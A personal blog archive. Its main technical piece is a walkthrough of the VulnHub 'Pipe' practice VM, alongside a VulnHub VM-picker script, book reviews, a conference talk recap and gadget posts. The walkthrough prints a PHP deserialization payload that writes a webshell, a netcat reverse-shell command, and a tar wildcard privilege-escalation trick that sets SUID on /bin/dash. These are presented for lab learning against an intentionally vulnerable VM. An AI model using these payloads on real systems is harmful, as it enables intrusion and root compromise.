I Built Something – Pick a VM.py

After that last post I got thinking to myself that an automated, random picker would be a simple project, and fun. I figured it’s probably fairly straightforward to run a site-specific google search against VulnHub, pull the download link for a VM, then dump it to a text file. That idea didn’t pan out at all really, but I did get the script built.

Turns out, you need API access to google for running scripts against it. Fair enough, this was a hobby project, so my intended usage was low enough that it was firmly in the free tier. I started looking at putting this together while poking around VulnHub in another tab. I found the RSS links. I’ve not done any API interaction, but I do know that one of python’s strengths is text manipulation. Pivot #1.

So how hard is it to pull a text file, with a very specific format, and dump the content to an array? Not hard at all. The feedparser module pulls this information into an array natively when provided a URL. Easy enough. Except it never loaded. I tested all my ideas in the interpreter, and the url I used, https://www.vulnhub.com/feeds/added/atom/, never seemed to load the variable like all the demos I was seeing. I tried other feeds, same result. Before I looked up anything about feed parser and https, I gave it one shot with http, since none of the samples I found were using it. Bingo. All is well. Er, maybe not. I had previously determined the only way to get a random entry is feed some random function a start and end value, then pull a random number. The end value would be the length of the array we just built. Except that when I tried to check that, I found a short list.

Now, the homepage of VulnHub.com shows there’s 13 pages of at least 3 VMs. That math didn’t work. So I checked the other feeds, and bingo again, the torrent link, http://www.vulnhub.com/feeds/torrent/atom/, has the information I want.

feeds_torrent_len

So now I know I have what I need, just need to do a little math.

math_vm

The next bit is pretty straightforward, revert that index value back into the actual data from the array.

print vh_feed['entries'][vm_pick]['title']

Well then. That’s all nice and fuzzy. Since we’re using this to look at torrents, couldn’t we just pull down the torrent file to our local watched folder? Logically it didn’t seem that hard. wget works just find in the terminal, there must be python stuff for this.

Absolutely.

pick_url = vh_feed['entries'][vm_pick]['link']

vm_pick_filename = path.basename(urlsplit(pick_url).path)
vm_pick_filename = "/Users/username/Downloads/" + vm_pick_filename

print vm_pick_filename

# if block to avoid overwrite existing thing of name
if not path.isfile(vm_pick_filename):
urlretrieve (pick_url, vm_pick_filename)

That’s it. It’s may not look like much, but it’s got it where it counts. For an exercise, i’m sure I’ll learn more that I can improve it later. If you want to grab it for any reason, feel free.

https://github.com/wea53L/python-utilities/blob/master/pick-a-vm.py

 

VulnHub Pipe Walkthrough

How do you get to be a pentester? Practice.

Pipe is a VM created by Sagi. I made a new commitment to myself to start working through these and writing them up, and this is my first example. My solution below is not unique, it is an amalgamation of techniques I grabbed reading the walkthroughs linked on VulnHub.com.

Step 0 : Get it running
I used Virtualbox for this because it’s what I had handy. The VM comes as an OVA, so loading it in Virtualbox is simple, just File -> Import. Networking can be confusing if you’re not practiced with hypervisors, in my case I chose to create a Host-only network(Virtualbox -> Preferences -> Network -> Host-only networks), checked the IP range and that DHCP was turned on. After import, you want to verify the network adapter settings of the VM and start it. In my case I did it headless. I have no need to interact with the console, and since 5.0 Virtualbox has had the option in the GUI to start headless.

Step 1 : Discovery/Enumeration
The default option here is nmap. that’s where I ended up. First I thought to try the idea I read in this tweet, however, that’s for Windows, and I am on a Mac, and I’d rather do the practice attacking than translating cmd to bash. This means the fallback is for me to start googling the parameters I can never seem to remember.

$ nmap -sP 192.168.56.0/24

Wicked, host found at 192.168.56.101. Moving right along, what’s it running. Again, more googling for nmap parameters.

$ nmap -sV 192.168.56.101
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 17:30 EST 
Nmap scan report for 192.168.56.101 Host is up (0.0046s latency). 
Not shown: 997 closed ports 
PORT    STATE SERVICE VERSION 
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0) 
80/tcp  open  http    Apache httpd 
111/tcp open  rpcbind 2-4 (RPC #100000) 
Service Info: OS: Linux; CPE:
cpe:/o:linux:linux_kernel

Hooray! Open ports! Easy to investigate open ports, like 80. Pointing a browser at it is a little disheartening at first. All you get is a login dialog.

pipe1

All my reading on other people’s hard work leads me to believe that tampering with HTTP verbs will help. I pointed the browser at a localhost proxy on 8080 and fired up BurpSuite. I tried every verb I know about(or could read about on wikipedia) without much results. I did see a 405 error, which I can’t remembering having see before. To get these results I captured a get request and sent it to Burp’s repeater tab, then just altered the verb each time.

GET 401 
HEAD ok 
TRACE unallowed 405 
POST 401 
PUT 401 
OPTIONS 401 
DELETE 401

So moving right back to my handy cheatsheets, I found you just need to send an invalid verb. In my case I chose BOB. Again I met a snag. The base “/“ request didn’t work. Instead of running back to the answers, I looked at the evidence I had. Slash was redirecting to index.php. Trying http://192.168.56.101/index.php still got me the login box, but if I repeated that request with my friend BOB, I got a result! I sent that back to the browser to further investigate.

Clicking the only link on the page, watching in Burp, I see the following parameter

param

Seems like a great spot to start injecting things, but what? I threw it over to the decoder tab, but that didn’t really clear anything up for me. 

decode

Back to the cheatsheets. The source of index.php has a fun source for it’s javascript.

script_source

Oh look, an accessible directory!

sciptz

Reading the files didn’t personally give me any insight into what’s happening, which really shows I need to work on my code reading skills. This means back to the cheatsheets, for the wisdom of folks much more experienced than I.

Rolling back a step, that parameter feeds php.js. Which has access to write to the filesystem, which is BAD. If you feed it some sample ideas, like so,

O:3:"Log":2:{s:8:"filename";s:28:"/var/www/html/scriptz/me.txt";s:4:"data";s:11:"howdy%20rowdy”;}

you get a result like this,

me.text

OOOOOO, the power, I can feel it. Oh… I can feel it.

Step 2: Exploitation
Using a new parameter,

O:3:"Log":2:{s:8:"filename";s:29:"/var/www/html/scriptz/me5.php";s:4:” data";s:41:"<?php%20$cmd%3d$_GET['cmd'];%20system($cmd);%20?>";}

Teaches me all about webshells. And that I need to install something listening on my attacker computer. Homebrew to the rescue.

# from attacker machine
$ brew install netcat
…magic…
nc -l 8888

Time to do the real hacker stuff. Hitting this link with Firefox, and watch the magic of vulnerable web servers.

http://192.168.56.101/scripts/me5.php?cmd=nc 192.168.56.1 -e /bin/bash

Here’s what I saw and did to check myself when the connection came back.

Connection from 192.168.56.101:57650
ls -la
total 28
drwxr-xr-x 2 www-data www-data 4096 Feb  4 07:30 .
drwxr-xr-x 4 www-data www-data 4096 Jul  9  2015 ..
-rw-r--r-- 1 www-data www-data   94 Jul  9  2015 .htaccess
-rw-r--r-- 1 www-data www-data  474 Jul  6  2015 log.php.BAK
-rw-r--r-- 1 www-data www-data   11 Feb  4 07:15 me.txt
-rw-r--r-- 1 www-data www-data   41 Feb  4 07:30 me5.php
-rw-r--r-- 1 www-data www-data 3768 Jul  5  2015 php.js
whoami
www-data

Full disclosure, as a newb, I’ve done nearly nothing with remote shells in this capacity, and the lack of prompt threw me off. I accidentally killed the connection more than a few times following my example mentors. Reconnecting is as easy as hitting the up arrow in Terminal to restart the listener, then refreshing the link in Firefox to restart the connection. So what do we know now? We’re interacting with the vulnerable machine as the user www-data. What can we do? Plenty, as it turns out. Privilege escalation is the only logical solution. So I poked around looking for info in the few files I found.

cat /scriptz/.htaccess
IndexIgnore .htaccess
Satisfy any
<Files ".htaccess">
order allow,deny
deny from all

cd ../
cat .htaccess
AuthUserFile /var/www/html/.htpasswd
AuthName "index.php"
AuthType Basic

require valid-user

cat .htpasswd
rene:$apr1$wfYjXf4U$0ZZ.qhGGrtkOxvKr5WFqX/

/scriptz/.htaccess had nothing interesting. Moved up a directory, and .htaccess points to .htpassword. .htpassword has … A USER! W00t. Now what can our new best friend rene do? Start by looking to see if they have anything interesting.

ls -la /home/rene
total 24
drwxr-xr-x 3 rene rene 4096 Jul  6  2015 .
drwxr-xr-x 3 root root 4096 Jul  5  2015 ..
-rw-r--r-- 1 rene rene  220 Jul  5  2015 .bash_logout
-rw-r--r-- 1 rene rene 3515 Jul  5  2015 .bashrc
-rw-r--r-- 1 rene rene  675 Jul  5  2015 .profile
drwxrwxrwx 2 rene rene 4096 Feb 11 07:01 backup

ls -la /home/rene/backup
total 104
drwxrwxrwx 2 rene rene  4096 Feb 11 07:03 .
drwxr-xr-x 3 rene rene  4096 Jul  6  2015 ..
-rw-r--r-- 1 rene rene 64477 Feb 11 07:00 backup.tar.gz
-rw-r--r-- 1 rene rene 15757 Feb 11 07:02 sys-13457.BAK
-rw-r--r-- 1 rene rene 11472 Feb 11 07:01 sys-2789.BAK
-rw-r--r-- 1 rene rene   539 Feb 11 07:03 sys-3978.BAK

That’s pretty interesting. Something is writing files. Actively. Cron is a handy tool for automated things. Wonder what it has to say for itself.

cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /root/create_backup.sh
*/5 * * * * root /usr/bin/compress.sh

Again my inexperience is a detriment. The last time I looked at a crontab file was 5 years ago. The last two lines did stick out to me as something interesting. I can’t access /root as www-data. Can I read /usr/bin? Yup.

cat /usr/bin/compress.sh
#!/bin/sh

rm -f /home/rene/backup/backup.tar.gz
cd /home/rene/backup
tar cfz /home/rene/backup/backup.tar.gz *
chown rene:rene /home/rene/backup/backup.tar.gz
rm -f /home/rene/backup/*.BAK

Leaning on my mentors yet again, there is a vulnerability in the configuration. Distilled to the least number of characters, there’s a vulnerability in the tar command as entered. I had to read up on this, since even after following the demo, I didn’t understand how my actions had worked. Here’s the relevant explainer,

Simple trick behind this technique is that when using shell wildcards,
especially asterisk (*), Unix shell will interpret files beginning with hyphen(-) character as command line arguments to executed command/program. That leaves space for variation of classic channeling attack. Channeling problem will arise when different kind of information channels are combined into single channel. Practical case in form of particulary this technique is combining arguments and filenames, as different “channels” into single, because of using shell wildcards.

Leon Juranic

With that in mind, the exploit below makes much more sense. First I verified I was where I needed to be on the vulnerable machine.

pwd
/var/www/html/scriptz
cd /home/rene/backup
pwd
/home/rene/backup

Assumptions verified, I followed the example of my favorite anonymous mentor, @g0blinResearch. I’m inserting files named as commands, which in turn are telling the vulnerable string in /usr/bin/compress.sh to create shell.sh(as root b/c of cron) and that it should change the SUID bit on /bin/dash. This means that as /bin/dash is called from any user, it will be running as root. I may be articulating this poorly, but if you follow the commands below, you see I get root.

echo > --checkpoint=1;
echo > --checkpoint-action=exec=sh\ shell.sh;
echo 'chmod u+s /bin/dash' > shell.sh
chmod +x shell.sh

This is our exploit, creating three files, and changing shell.sh to be executable. Below I’m verifying this worked as intended.

ls -la
total 164
-rw-r--r-- 1 www-data www-data 1 Feb 11 07:12 --checkpoint-action=exec=sh shell.sh
-rw-r--r-- 1 www-data www-data 1 Feb 11 07:12 --checkpoint=1
drwxrwxrwx 2 rene rene 4096 Feb 11 07:13 .
drwxr-xr-x 3 rene rene 4096 Jul 6 2015 ..
-rw-r--r-- 1 rene rene 90755 Feb 11 07:10 backup.tar.gz
-rwxr-xr-x 1 www-data www-data 20 Feb 11 07:13 shell.sh
-rw-r--r-- 1 rene rene 25883 Feb 11 07:12 sys-2531.BAK
-rw-r--r-- 1 rene rene 465 Feb 11 07:13 sys-26349.BAK
-rw-r--r-- 1 rene rene 20350 Feb 11 07:11 sys-8054.BAK

Waiting for the next loop of cron to run, I go and get a cup of coffee and check back by running /bin/dash.

/bin/dash
whoami
root

#w00t

I guess that’s the root part of boot2root, huh? Well then. Lets just finish this quickly to get moved on to the next.

cd /root

ls
create_backup.sh
flag.txt
cat flag.txt
                                                   .aMMMMMMMMn.  ,aMMMMn.
                                                                 .aMccccccccc*YMMn.    `Mb
                                                                aMccccccccccccccc*Mn    MP
                                                               .AMMMMn.   MM `*YMMY*ccaM*
                                                              dM*  *YMMb  YP        `cMY
                                                              YM.  .dMMP   aMn.     .cMP
                                                               *YMMn.     aMMMMMMMMMMMY'
                                                                .'YMMb.           ccMP
                                                             .dMcccccc*Mc....cMb.cMP'
                                                           .dMMMMb;cccc*Mbcccc,IMMMMMMMn.
                                                          dY*'  '*M;ccccMM..dMMM..MP*cc*Mb
                                                          YM.    ,MbccMMMMMMMMMMMM*cccc;MP
                                                           *Mbn;adMMMMMMMMMMMMMMMIcccc;M*
                                                          dPcccccIMMMMMMMMMMMMMMMMa;c;MP
                                                          Yb;cc;dMMMMMMMMMMMP*'  *YMMP*
                                                           *YMMMPYMMMMMMP*'          curchack
                                                       +####################################+
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       +----------------------------------+-+
                                                        ####################################
                                                             |======                  |
                                                             |======                  |
                                                             |=====                   |
                                                             |====                    |
                                                             |                        |
                                                             +                        +

 .d8888b.                 d8b          d8b               888                                                                    d8b
d88P  Y88b                Y8P          88P               888                                                                    Y8P
888    888                             8P                888
888        .d88b.  .d8888b888   88888b."  .d88b. .d8888b 888888   88888b.  8888b. .d8888b    888  88888888b.  .d88b.    88888b. 88888888b.  .d88b.
888       d8P  Y8bd88P"   888   888 "88b d8P  Y8b88K     888      888 "88b    "88b88K        888  888888 "88bd8P  Y8b   888 "88b888888 "88bd8P  Y8b
888    88888888888888     888   888  888 88888888"Y8888b.888      888  888.d888888"Y8888b.   888  888888  88888888888   888  888888888  88888888888
Y88b  d88PY8b.    Y88b.   888   888  888 Y8b.         X88Y88b.    888 d88P888  888     X88   Y88b 888888  888Y8b.       888 d88P888888 d88PY8b.   d8b
 "Y8888P"  "Y8888  "Y8888P888   888  888  "Y8888  88888P' "Y888   88888P" "Y888888 88888P'    "Y88888888  888 "Y8888    88888P" 88888888P"  "Y8888Y8P
                                                                  888                                                   888        888
                                                                  888                                                   888        888
                                                                  888                                                   888        888
Well Done!
Here's your flag: 0089cd4f9ae79402cdd4e7b8931892b7

And that’s all. I learned a ton. Hopefully as I do more of these there will be less leaning on the hard work of others, and more “hacker intuition”. In the mean time, this blog post is brought to you by the fine walkthroughs below,

https://research.g0blin.co.uk/devrandom-pipe-vulnhub-writeup/
http://rastamouse.me/blog/2015/pipe/
http://oldsmokingjoe.blogspot.sg/2015/12/dfdf-setsharsethernetpara.html

and the lovely folks at vulnhub.com. If you’re interested in this stuff, I highly recommend you pull down some of their VMs and try it yourself. It’s not that hard, it is that fun, and there’s a lot to learn!

Since I’m done, it’s time to turn off the lights on my way out of the VM, since I’m root and all.

shutdown -h now

Books 2015 61-7976

I grew up idolizing pilots, particularly fighter pilots, and with them the space program. I have a very clear memory of visiting the JPL when I was five or six years old. Someone there was giving my dad a tour and I was able to tag along. Other cool places I learned about flight were airshows. It was always a big deal to go see the Blue Angels when they were nearby. I think part of it was Navy pride, and part of it was my dad’s memory of living at NAS Pensacola, the winter home of the Angels. I was born in Pensacola, but the only memories I have of it were vacations there later in life.

We moved to Ohio in 1989, and the absolute best part of it was moving minutes away from the United States Air Force Museum. 3 hangers FULL of airplanes, spacecraft, and all the associated memorabilia, videos, stickers, models, dioramas and displays. A few years later I remember staying home from school to go sit on a hill and watch one of the last Blackbirds fly in. 61-7976 is the tail number, and I’ll never forget the feeling. Even from a mile or more away, the sound shook you. This is an aircraft that cruised with the afterburners on. It flew at three times the speed of sound. I still cannot believe I was lucky enough to see one in the air.

Over the weekend I was stuck at a car dealership, as one gets sometimes when you need necessary repairs on short notice. Bored, and looking for something to pass time that wouldn’t drain all my batteries, I found Sled Driver: Flying the World’s Fastest Jet on my hard drive. I’m not sure where I acquired it, but it was great timing. This book chronicles the section of its author’s career driving the “Sled”, the “Habu”, the “Blackbird”, the SR-71. The author recounts every step, from volunteering, interviewing, training, and finally flying the fastest airplane built by humankind. I’ve always known about the machine scientifically, it’s fast. Really Fast. It leaks fuel on the ground, because its skin was designed so expand under the friction of the air as it cruised at two or three times the speed of sound. This book tells you the human elements. How stressful it is to understand that you cannot make mistakes. Every mission the pilot holds the life of himself and his RSO(Reconnaissance Systems Officer) in his hands. I think the author wisely avoids much discussion of the actual missions, but instead focuses on relating what its like to sit in that cockpit, hurtling forward faster than a rifle bullet. For four years, that was this man’s day job. I’ve had a couple of jobs in life, but I don’t think I’ll ever do something like that.

I was born at a time when America was just getting comfortable with the idea of going into space. We had been to the moon, and the Space Shuttle was just really getting her start. At the same time the cold war was raging, so the military and NASA got all the money they could ask for. Since then the Cold war has ended, and NASA feels forgotten to a kid that grew up drawing of space as something both science fiction and science fact. You can debate the politics of the situation all day long, but the SR-71 was a monument to human achievement. It was designed, planned, tested, built, and put into production(they built thirty two of those crazy machines) at a time when computers were not a commodity device. I’ve had access to more computing power for almost my entire life than the entire project team designing the fastest airplane every built.Reading this book makes me hope that the legacy of my generation can hopefully come up with some achievement more meaningful than another version of Flappy Bird, or another slick source code version control system.

Books 2015 IWT

Today’s summary is about “I Will Teach You To Be Rich” by Ramit Sethi. Despite what sounds like a sleazy title, I will count this book among the best I’ve ever read in terms of actionable content, written for YOU to get results. Yes, I’m sure that Ramit is very happy people like and buy his book, but from the first page to the last, he is encouraging the reader to look beyond their current state, and to get better.

This book isn’t about how to earn sick piles of cash to sleep on. It’s most basic message is that you can make your money work for you, so that you are able to enjoy a rich life. How you define a rich life is your own journey. Remit believes, and I with him, that worrying about which bill is paid when, which account to use for what, and managing your finances down to every tenth of a cent is in no way a rich life. Money is important, and having increasing amounts of it is not a bad goal. This book is super cheap and if you’re really that broke, half it’s content is available from Ramit himself in many places online. However, it’s worth a buy. This is the second book I’ve purchased as an adult for another person. It’s the first book I’ve done that after reading. It won’t be the last.

Remit doesn’t bullshit you. Learning to deal with money takes work. Unlearning or changing bad or outdated habits is hard. I’m just starting my journey following his ideas to automate my finances and the rewards are dramatic. They’re also a lot of work. Don’t be lazy. Try harder.

My fancy pen

This post is follow up. I spent a month trying to determine if this would work, and finally just threw money at the problem. I did get lucky though.

I have a lovely pen, a Muji fountain pen. This ticks all the little things I desire most in a quality writing implement. It’s a cylinder from top to bottom, it has a snap cap rather than screw on, and it takes cartridges, to keep me from spending obscene amounts of time and money dorking with ink.

Once I bought one, I found out this pen ships with a “fine” nib.
finenib

In practice, with my handwriting and notebooks, this is not ok. I found a fair number of forum and blog posts where people discuss changing nibs, but there’s very little resolution. So I did some learning, and it looks like a #5 nib should be a drop in replacement.The fine folks at Goulet Pens happen to sell a #5 Edison Extra Fine. More searching blogs and forums say it should work. $20 and a couple days later, I can confirm. My cheap pen ended up costing me around forty bucks, plus ink, but I’m damn happy about the result.

final

Books 2015 Part 1

The intention of this post was to be an annual reflection of my reading habits. Since I’ve kept at it for seven months, I’m not going to delay it until 2016, I’ll just drop monthly updates whenever I work my way through a book or two.

January 2015

I started re-reading Shadowrun novels after trying to plan a blog post relating my Macbook to a cyberdeck in this universe. I got sucked in because they’re entertaining. I haven’t read many of these since early college, and it is fascinating to see what predictions about the future they totally missed. Fax machines are still a thing in this universe. And payphones, called telecoms, but the principal is the same.

Streets of Blood

Nosferatu

Striper Assassin

February 2015

Just a single entry, because Neal Stephenson writes books that are forever long. Snow Crash is the next book out of people’s mouths after Neuromancer. I’ve read most of William Gibson’s cyberpunk stuff, so I decided it was time to give this one a shot. It’s got some great stuff in it, but is way to long to develop what really was a fairly simple story. I think I’ll be avoiding Neal Stephenson for awhile. I still love Cryptonomicon, but I was pretty unhappy at the end of reading this book, despite the utterly badass notion of a hacker with swords that wrote a sword-fighting engine to match his reality.

Snow Crash

March 2015

March is nonfiction month. I’ve spent two months this year reading fiction, so now it’s time to get on track with something else. I’ve got a backlog of want and need to read stuff. I don’t really have any goal except to read new books rather than re-read old books, and for them to be non-fiction. However, they’re obviously closely matched to my interests, one has Macintosh in the title.

The Macintosh Way Picked this up when Guy put these out for free. I am nostalgic about Classic Mac stuff, probably because it was my first exposure to computing. I’ve read folklore.org on and off for almost ten years. Now that I have experience watching and interacting with the management of a fair sized corporation, these sorts of books are a lot more interesting. — After finishing the book its very funny to compare 1990 Apple to 2015 Apple. There’s a lot that they didn’t do or believe in now that is a staple of their business, mostly retail and hands on support. There are many other things that stand out as exactly the same, namely they want developers to create fantastic Mac and iOS applications. Apple does not want ports from other operating systems, they don’t want good enough, they want their platform to run the best software.

Lauren Ipsum I think I saw this on one too many infosec slides and need a short break to something completely different. Its borderline non-fiction. There’s a little girl lost in a strange world, which turns out to directly map to computing concepts. Its kind of like Tron meets Through the Looking Glass. It’s not a bad story, just feels, exaggerated for the effect of the metaphor. I probably will not be reading this again.

April 2015

Continuing non-fiction, I started with Creativity, Inc. Mostly because I bought a copy for my Dad and I know he will want to discuss it. Well, that and Ed Catmull and Pixar have proven to be one of the most clever groups to deal with people.

May 2015

Finally finished Creativity, Inc. To crudely sum it up, the entire book focuses on intrinsic honesty. Pixar’s success is based on the fact that anyone can tell anyone anything, no repercussions. Catmull presents this in different ways, talking about his own history, John Lasseter and the other film directors, and of course Steve Jobs. They all have a different way of looking at it and phrasing it, but honesty is what drives their professions and the company they work for. Its impressive to read about a company that both says they work for that kind of honesty, then shows it. Catmull describes many painful moments that they needed the honesty to make the films work. He also talks about “Notes Day”, when they turned to the company at large to help them become more effective. This struck me because he describes the thoughts leading up to it, its execution, and it’s followthrough. I’ve never seen something like that executed on that scale by an organization so … honestly.

June 2015

Busy month, nothing to report here other than I’ve pledged to myself that I need to read more books I’ve never read before. I spent a fair bit of time thinking about it and realized I’ve been reading the same couple of dozen books every few years for roughly twenty years. No more. I’ll need a break eventually, but for now I need to stop reading pulp sci-fi and horror books. I need to spend more time reading different things. For now that’s all pretty technical non-fiction, but we’ll see where this path ends.

July 2015

June was weird and as such I didn’t actually finish things. I slowly moved through this, Dissecting the Hack: The F0rb1dd3n Network, Revised Edition , at home and WOW is all I can think to say. If you ever know anyone interested in the nuts and bolts of infosec, this is the book for them. It’s got a cheesy narrative story in the first half of the book, which feels like a true-to-life adaptation of the movie hackers. However the second half is astoundingly verbose, contextualizing every bit of jargon, in-joke, or techy thing that happens in the story. After reading this I feel like if I had read this two year ago, I would be in a very different position in my life. This book compiles all the things that I’ve picked up from blog posts, con talks, conversations, twitter, and every other source that has helped me learn about infosec. Totally worth the time for anyone that considers themselves new to the industry, or anyone willing to learn a little bit more.

At work I’m also trying to branch out, but this time with a lot less success than my home book. Metasploit, The Penetration Tester’s Guide felt list a mis-guided mess. The book opens with a quick once over through Metasploit features, where and why to use them, but left me with lots of “how?” questions. The most glaring example is database use. The book guides you through using nmap directly in Metasploit, storing the results in a database, and then . . . nothing. That’s the last reference to the database that I saw. WHY would you store all your scan results, then not use them as a variable in every module for the rest of the book?! That failure definitely biased me through the rest of the book, because for every example I’m asking, “Why the HELL am I typing RHOST again?!”. Another sin that bugged me, but honestly is not the authors fault, is that two thirds of the exploit examples are based on Windows XP SP2. In 2010, when the book was published, that wasn’t that big of a deal to find. Now? In 2015? I’ve got access to a software testing library, and we don’t keep those laying around. I blame this on the editorial staff not being technically foresighted enough. There are plenty of intentionally vulnerable linux distros that could have stood in for Windows. Enough ranting. If you’re reading this and interested in Metasploit, read the Offensive Security version of this book, Metasploit Unleashed.

Be Humble

I was lucky enough to get selected again to speak at the local BSides this year. It was a fantastic experience, better than last year. I got a lot of good feedback and discussion from my talk, entitled, “DIY Hacker Training, a Walkthrough”. I just went through the things that I use for learning resources and keeping track of news around the infosec community.

The second keynote of the day was … unexpected. Chris Nickerson is typically the first person people point to when the topic of “rockstar” in the community is raised. He tells funny stories, he’s often seen with a drink in hand, and he’s always talking about this time he got into some shit. Saturday Chris got up and put his story out there for everyone to see, as a lesson, almost a confession, and a pledge to get better. He talked about the highs of leading in the infosec community for 20 years, attaining that “rockstar” status; TV shows, board positions, leading companies, owning companies, pwning companies. He also talked about the hard parts, the rough patches, the terrorizing that he and his loved ones are enduring every day. It’s a hard lesson to learn and I’m sure an even harder one to teach. I am grateful for the lesson and for Chris’ sacrifice. He has taught me more than a few things over the last few years as I have grown up into this field. The message I got from him awhile ago, that he underscored again on Saturday, is universal. No one can claim to live a full life without it and absolutely no one can have a decent career without it. Be humble. Don’t be cocky. Everyone, no matter how smart, no matter how dumb, no matter where they’re coming from, everyone knows something you don’t, and can teach you things.

It’s often said that the key to succeeding in Information Security is mindset. You have to think like an attacker, think about what it can do, rather than what it should do. Since the first time I heard Chris say this in a talk, I’ve watched him and others in the community live it at cons, on twitter, in their blogs. Everyone can help you get better. As they can help you, so can you help them. Share your insights, share your experience, share your knowledge. There’s not a better message to take home.

Be Humble.

Wow. Just, Wow.

Since Windows 7 announced or demoed their Aero-Snap feature, I’ve wanted it for OS X. I  find it extremely handy to be able to just throw a window towards an edge of a screen and have it conform to a size by default. Two windows side-by-side are incredibly useful for learning things in a terminal or IDE with a browser right next to it. I’ve been wishing for something, particularly since I got my Macbook 11. Better Touch Tool is that thing. And its FREE.

I found it because someone posted some jab at the dev for running out of version numbers on Twitter, which prompted me to check out the reddit thread, and I finally downloaded the tool. AND THE FIRST THING IT ASKED ME ON THE FIRST LAUNCH WAS TO ENABLE WINDOW SNAP. Done. Winner. Over in one round. As long as this tool keeps working it’ll be on my macs.

Update, 06.24.2015 – Doesn’t Apple finally announce this feature for OS X this fall? sumbitch. If you have an *extra* mac, I recommend the betas.

I Built Something – VBox Lab PS

I’ve dabbled in programming of one sort or another since I learned BASIC in 4th grade. Finally I’m starting to envision products I need small enough to get my feet wet. There will be at least one more of these, once I figure out some intricacies of Objective-C.

I learned quite some time ago that you can interact with VirtualBox on the commandline. Which is super handy if you’re in the habit of leaving a shell open. Lately I’ve been trying to spend time learning network enumeration, on the long list of things I need to practice with before attempting PWK/OSCP later this year. At work this means finding VirtualBox on Windows8’s Metro mania, and clicking around. Which gets old. No more.

VBox_Lab.ps1 is a quick PowerShell utility to do what I need most. Launch VMs, headless or not.

pretty

I learned a LOT from this. Everything was copy a little bit from a How-To and change it some, test, Repeat. Repeat. Repeat. Debugging even something this simple gets complex. Dynamic menus, it turns out, are quite a thing to have to learn how to do. I’m glad I did though, because it makes this portable.

I already have a long feature list to add, but for right now it works without crashing, which is a fantastic place to pause and put it out there.

Good Deals

I’m an Apple guy. This started when my dad was in grad school, the lab had Macs. I got to spend an hour or two when I was super young playing with MacPaint. I thought this was great, but didn’t appreciate the significance until much later. The important part here is that my dad got to like Apple gear, Macs in particular. Quite some time later the first family computer was an old Mac Plus. After that came a Performa. When I went away to college I ordered an iBook.

That iBook. Man, I abused that computer. I learned so very, very much about having and supporting myself with it. I had no support structure, the few people I was close with all had Windows machines. One friend was into Macs, but I only talked to him over AIM. Which meant I had to have a working computer and network connection. This was not often the case, since I was perpetually installing, re-installing, re-installing, un-installing all kinds of things. In addition to the basics of computergeekery that I picked up, there was also the freedom. At the time it was a slow machine, wireless wasn’t really a thing, and it had nearly no storage, but it was portable. It even had a handle. I lived from that machine for almost two years. It went everywhere with me. Across campus to print something, home on the weekends, across country on vacation. Once I decided on a major, I needed to upgrade. Of course I picked another Mac, upgrading to a PowerMac and handing the iBook down. It was a revolution to me to be able to move my entire computing world with me from place to place. In retrospect, it was categorically not a good deal. After taxes it was over $1800. Nevermind the specs, because they’re less than an original iPod touch, but for the time it was expensive. Looking back it was a terrific waste of cash. I don’t regret the purchase, because if nothing else it began teaching me how to support my equipment with only the internet.

There are a lot of things I do not miss about that computer, but from the day I moved on, I missed being able to have my Mac with me. Along the way, I kept trying other things to find a portable machine that was super light, super mobile, and had what I wanted. I tried a few Dells, from the weird and compromised Dell Latitude X300, I briefly had an e4300, and lastly with a frankensteined e4310. They were good enough computers, and for the little bit of money I paid for them, nice. But they were Dells, and only ran Windows or Linux. The X300 was an early “ultrabook” which translated to it was thin because it had no optical drive. The X300 was released in 2003. I bought mine around 2009. I wasn’t able to find a comparable model for the price in the 5 years after that was as small and light. Latitudes as a group are great workhorse computers. They’re easy to fix, there’s tons of parts, meh. They’re boring and have shitty keyboards too.

Where is all this leading? I got a new laptop last year. And, for the first time since 2001, it’s an Apple laptop. That is mine. It was a good deal too; 2 year old MacBook Air 11″. For $350. That’s at the top end of “good deal”, edging towards “great deal”. It’s tiny, has an SSD, so its fast, and it works. Well, it works now. I had barely gotten it up and running, wiped the drive, registered for the Yosemite beta, gotten it installed. Then I opened it, thrilled to have MY laptop running an OS X beta , finally I can help Apple find bugs, and nothing happened. I plugged it in. No lights lit up on the MagSafe adapter. Oh. Goody.

So I did what you’re supposed to do. I made an appointment and took it to the Genius Bar. They did not have good news. They could replace the Logic Board, for something like $500, or they could send it to the depot. The depot has a flat repair charge, $300, they send it back working. I opted for the depot. I spent all my “loose” money buying the damn thing, I can’t afford to trust that its simply the logic board. In no way could I spend five hundred dollars on this. A few days later they called, it was back and working. I picked it up, I paid my fee. For those of you playing the home game, my cheap MacBook has now cost me $650. At the time that was $70 less than a refurbished 2014 model. And if only the story ended there.

The night after I picked it up, I sat down on the couch to finally enjoy the freedom to surf and watch TV. I opened it and the display was dark. Going through common troubleshooting steps I found it was working, charging was fine, external video was fine. So I checked the display with a flashlight. Dead backlight. By shining a bright flashlight near the display I could see it was getting signal, but there was nothing lighting it. Back to the Genius Bar. This time I learned my favorite bit of Genius jargon, “looper”. Since it was a repeat-offender, all the repairs are on Apple. They replaced the entire top half of the laptop for free. I’ve got the receipt, bottom line reads, “amount due: $0.00”. That was a great day. Too bad I was back less than a week later. By this time half the staff of the Genius Bar knew me on site. They tried to help, told me to ask for a replacement because I have, “no confidence”, in that particular machine. Thankfully that wasn’t necessary. They replaced the display assembly(lid) again AND the logic board. This adds up to nearly two computers worth of parts I’ve gotten for my $300 depot repair investment. Which isn’t bad. It’s still not a good deal, but I’ve got my own working laptop, legitimately running OS X.

I’ve returned to the days when I can just grab a bag and go out the door, trusting that I can solve any problem with what I’ve got on me. The bag is a lot lighter now, too.